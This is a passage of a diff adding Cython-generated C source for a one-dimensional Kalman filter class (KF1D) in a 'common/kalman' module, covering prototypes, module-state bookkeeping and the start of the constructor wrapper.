*__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4__reduce_cython__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_6__setstate_cython__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_6common_6kalman_18simple_kalman_impl_KF1D(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D; + #endif + PyTypeObject *__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D; + PyObject *__pyx_n_s_A; + PyObject *__pyx_n_s_C; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0; + PyObject *__pyx_n_s_K; + PyObject *__pyx_n_s_KF1D; + PyObject *__pyx_n_s_KF1D___reduce_cython; + PyObject *__pyx_n_s_KF1D___setstate_cython; + PyObject *__pyx_n_s_KF1D_update; + PyObject *__pyx_n_s_PickleError; + PyObject *__pyx_n_s__11; + PyObject *__pyx_kp_u__2; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_kp_s_common_kalman_simple_kalman_impl; + PyObject *__pyx_n_s_common_kalman_simple_kalman_impl_2; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_n_s_dict_2; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_meas; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_new; + PyObject *__pyx_n_s_pickle; + PyObject *__pyx_n_s_pyx_PickleError; + PyObject *__pyx_n_s_pyx_checksum; + PyObject *__pyx_n_s_pyx_result; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_type; + PyObject *__pyx_n_s_pyx_unpickle_KF1D; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_self; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_state; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_s_use_setstate; + PyObject *__pyx_n_s_x0; + PyObject *__pyx_n_s_x0_0; + PyObject *__pyx_n_s_x1_0; + PyObject *__pyx_int_54762874; + PyObject *__pyx_int_230653288; + PyObject *__pyx_int_266195929; + PyObject *__pyx_tuple_; + PyObject *__pyx_tuple__3; + PyObject *__pyx_tuple__5; + PyObject *__pyx_tuple__7; + PyObject *__pyx_tuple__9; + PyObject *__pyx_codeobj__4; + PyObject *__pyx_codeobj__6; + PyObject *__pyx_codeobj__8; + PyObject *__pyx_codeobj__10; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D); + Py_CLEAR(clear_module_state->__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D); + Py_CLEAR(clear_module_state->__pyx_n_s_A); + Py_CLEAR(clear_module_state->__pyx_n_s_C); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_CLEAR(clear_module_state->__pyx_n_s_K); + Py_CLEAR(clear_module_state->__pyx_n_s_KF1D); + Py_CLEAR(clear_module_state->__pyx_n_s_KF1D___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_KF1D___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_KF1D_update); + Py_CLEAR(clear_module_state->__pyx_n_s_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s__11); + Py_CLEAR(clear_module_state->__pyx_kp_u__2); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_kp_s_common_kalman_simple_kalman_impl); + Py_CLEAR(clear_module_state->__pyx_n_s_common_kalman_simple_kalman_impl_2); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_n_s_dict_2); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_meas); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_new); + Py_CLEAR(clear_module_state->__pyx_n_s_pickle); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_checksum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_result); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle_KF1D); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_state); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_s_use_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_x0); + Py_CLEAR(clear_module_state->__pyx_n_s_x0_0); + Py_CLEAR(clear_module_state->__pyx_n_s_x1_0); + Py_CLEAR(clear_module_state->__pyx_int_54762874); + Py_CLEAR(clear_module_state->__pyx_int_230653288); + Py_CLEAR(clear_module_state->__pyx_int_266195929); + Py_CLEAR(clear_module_state->__pyx_tuple_); + Py_CLEAR(clear_module_state->__pyx_tuple__3); + Py_CLEAR(clear_module_state->__pyx_tuple__5); + Py_CLEAR(clear_module_state->__pyx_tuple__7); + Py_CLEAR(clear_module_state->__pyx_tuple__9); + Py_CLEAR(clear_module_state->__pyx_codeobj__4); + Py_CLEAR(clear_module_state->__pyx_codeobj__6); + Py_CLEAR(clear_module_state->__pyx_codeobj__8); + Py_CLEAR(clear_module_state->__pyx_codeobj__10); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D); + Py_VISIT(traverse_module_state->__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D); + Py_VISIT(traverse_module_state->__pyx_n_s_A); + Py_VISIT(traverse_module_state->__pyx_n_s_C); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_VISIT(traverse_module_state->__pyx_n_s_K); + Py_VISIT(traverse_module_state->__pyx_n_s_KF1D); + Py_VISIT(traverse_module_state->__pyx_n_s_KF1D___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_KF1D___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_KF1D_update); + Py_VISIT(traverse_module_state->__pyx_n_s_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s__11); + Py_VISIT(traverse_module_state->__pyx_kp_u__2); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_kp_s_common_kalman_simple_kalman_impl); + Py_VISIT(traverse_module_state->__pyx_n_s_common_kalman_simple_kalman_impl_2); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_n_s_dict_2); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_meas); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_new); + Py_VISIT(traverse_module_state->__pyx_n_s_pickle); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_checksum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_result); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle_KF1D); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_state); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_s_use_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_x0); + Py_VISIT(traverse_module_state->__pyx_n_s_x0_0); + Py_VISIT(traverse_module_state->__pyx_n_s_x1_0); + Py_VISIT(traverse_module_state->__pyx_int_54762874); + Py_VISIT(traverse_module_state->__pyx_int_230653288); + Py_VISIT(traverse_module_state->__pyx_int_266195929); + Py_VISIT(traverse_module_state->__pyx_tuple_); + Py_VISIT(traverse_module_state->__pyx_tuple__3); + Py_VISIT(traverse_module_state->__pyx_tuple__5); + Py_VISIT(traverse_module_state->__pyx_tuple__7); + Py_VISIT(traverse_module_state->__pyx_tuple__9); + Py_VISIT(traverse_module_state->__pyx_codeobj__4); + Py_VISIT(traverse_module_state->__pyx_codeobj__6); + Py_VISIT(traverse_module_state->__pyx_codeobj__8); + Py_VISIT(traverse_module_state->__pyx_codeobj__10); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_6common_6kalman_18simple_kalman_impl_KF1D __pyx_mstate_global->__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D +#endif +#define __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D __pyx_mstate_global->__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D +#define __pyx_n_s_A __pyx_mstate_global->__pyx_n_s_A +#define __pyx_n_s_C __pyx_mstate_global->__pyx_n_s_C +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0 +#define __pyx_n_s_K __pyx_mstate_global->__pyx_n_s_K +#define __pyx_n_s_KF1D __pyx_mstate_global->__pyx_n_s_KF1D +#define __pyx_n_s_KF1D___reduce_cython __pyx_mstate_global->__pyx_n_s_KF1D___reduce_cython +#define __pyx_n_s_KF1D___setstate_cython __pyx_mstate_global->__pyx_n_s_KF1D___setstate_cython +#define __pyx_n_s_KF1D_update __pyx_mstate_global->__pyx_n_s_KF1D_update +#define __pyx_n_s_PickleError __pyx_mstate_global->__pyx_n_s_PickleError +#define __pyx_n_s__11 __pyx_mstate_global->__pyx_n_s__11 +#define __pyx_kp_u__2 __pyx_mstate_global->__pyx_kp_u__2 +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_kp_s_common_kalman_simple_kalman_impl __pyx_mstate_global->__pyx_kp_s_common_kalman_simple_kalman_impl +#define __pyx_n_s_common_kalman_simple_kalman_impl_2 __pyx_mstate_global->__pyx_n_s_common_kalman_simple_kalman_impl_2 +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_n_s_dict_2 __pyx_mstate_global->__pyx_n_s_dict_2 +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_meas __pyx_mstate_global->__pyx_n_s_meas +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_new __pyx_mstate_global->__pyx_n_s_new +#define __pyx_n_s_pickle __pyx_mstate_global->__pyx_n_s_pickle +#define __pyx_n_s_pyx_PickleError __pyx_mstate_global->__pyx_n_s_pyx_PickleError +#define __pyx_n_s_pyx_checksum __pyx_mstate_global->__pyx_n_s_pyx_checksum +#define __pyx_n_s_pyx_result __pyx_mstate_global->__pyx_n_s_pyx_result +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_type __pyx_mstate_global->__pyx_n_s_pyx_type +#define __pyx_n_s_pyx_unpickle_KF1D __pyx_mstate_global->__pyx_n_s_pyx_unpickle_KF1D +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_state __pyx_mstate_global->__pyx_n_s_state +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_s_use_setstate __pyx_mstate_global->__pyx_n_s_use_setstate +#define __pyx_n_s_x0 __pyx_mstate_global->__pyx_n_s_x0 +#define __pyx_n_s_x0_0 __pyx_mstate_global->__pyx_n_s_x0_0 +#define __pyx_n_s_x1_0 __pyx_mstate_global->__pyx_n_s_x1_0 +#define __pyx_int_54762874 __pyx_mstate_global->__pyx_int_54762874 +#define __pyx_int_230653288 __pyx_mstate_global->__pyx_int_230653288 +#define __pyx_int_266195929 __pyx_mstate_global->__pyx_int_266195929 +#define __pyx_tuple_ __pyx_mstate_global->__pyx_tuple_ +#define __pyx_tuple__3 __pyx_mstate_global->__pyx_tuple__3 +#define __pyx_tuple__5 __pyx_mstate_global->__pyx_tuple__5 +#define __pyx_tuple__7 __pyx_mstate_global->__pyx_tuple__7 +#define __pyx_tuple__9 __pyx_mstate_global->__pyx_tuple__9 +#define __pyx_codeobj__4 __pyx_mstate_global->__pyx_codeobj__4 +#define __pyx_codeobj__6 __pyx_mstate_global->__pyx_codeobj__6 +#define __pyx_codeobj__8 __pyx_mstate_global->__pyx_codeobj__8 +#define __pyx_codeobj__10 __pyx_mstate_global->__pyx_codeobj__10 +/* #### Code section: module_code ### */ + +/* "common/kalman/simple_kalman_impl.pyx":5 + * + * cdef class KF1D: + * def __init__(self, x0, A, C, K): # <<<<<<<<<<<<<< + * self.x0_0 = x0[0][0] + * self.x1_0 = x0[1][0] + */ + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_x0 = 0; + PyObject *__pyx_v_A = 0; + PyObject *__pyx_v_C = 0; + PyObject *__pyx_v_K = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_x0,&__pyx_n_s_A,&__pyx_n_s_C,&__pyx_n_s_K,0}; + PyObject* values[4] = {0,0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_x0)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 5, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_A)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 5, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 4, 4, 1); __PYX_ERR(0, 5, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_C)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 5, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 4, 4, 2); __PYX_ERR(0, 5, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (likely((values[3] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_K)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 5, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 4, 4, 3); __PYX_ERR(0, 5, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 5, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 4)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + } + __pyx_v_x0 = values[0]; + __pyx_v_A = values[1]; + __pyx_v_C = values[2]; + __pyx_v_K = values[3]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 5, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D___init__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), __pyx_v_x0, __pyx_v_A, __pyx_v_C, __pyx_v_K); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D___init__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_x0, PyObject *__pyx_v_A, PyObject *__pyx_v_C, PyObject *__pyx_v_K) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject 